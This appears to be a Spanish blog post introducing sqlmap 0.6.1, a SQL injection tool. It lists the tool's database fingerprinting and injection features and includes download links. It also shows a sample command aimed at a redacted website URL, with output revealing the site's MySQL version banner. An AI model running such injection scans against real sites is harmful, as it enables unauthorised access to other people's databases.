Características
Soporte completo para MySQL, Oracle, PostgreSQL y Microsoft SQL. Además de estos cuatro sistemas de gestión de bases de datos, sqlMap también puede identificar Microsoft Access, DB2, Informix, Sybase y Interbase.
Amplia base de datos de sistema de gestión de huellas dactilares basadas en inband error messages, analizar el banner, las funciones de salida de comparación y características específicas tales como MySQL comment injection. También es posible forzar a la base de datos de sistema de gestión de nombre si ya lo saben.
Soporte completo para 2 técnicas de SQL injection: blind SQL injection y inband SQL injection.
Aqui podemos ver la herramienta en ejecución enumerando la versión utilizada del MySQL:
# ./sqlmap.py -u "http://XXXXXXXXXXX/detail.php?code=XXXXX" -b
sqlmap/0.6.1 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
and Daniele Bellucci <daniele.bellucci@gmail.com>
starting at: 21:58:00
[21:58:01]
[WARNING] User-Agent parameter ‘User-Agent’ is not dynamic
back-end DBMS: MySQL >= 5.0.0
banner: ‘5.0.51b-community’
shutting down at: 21:58:07
Descargar [Windows]
Descargar [GNU/Linux]












0 comentarios: sobre Herramienta De Inyección SQL Automática
Publicar un comentario para Herramienta De Inyección SQL Automática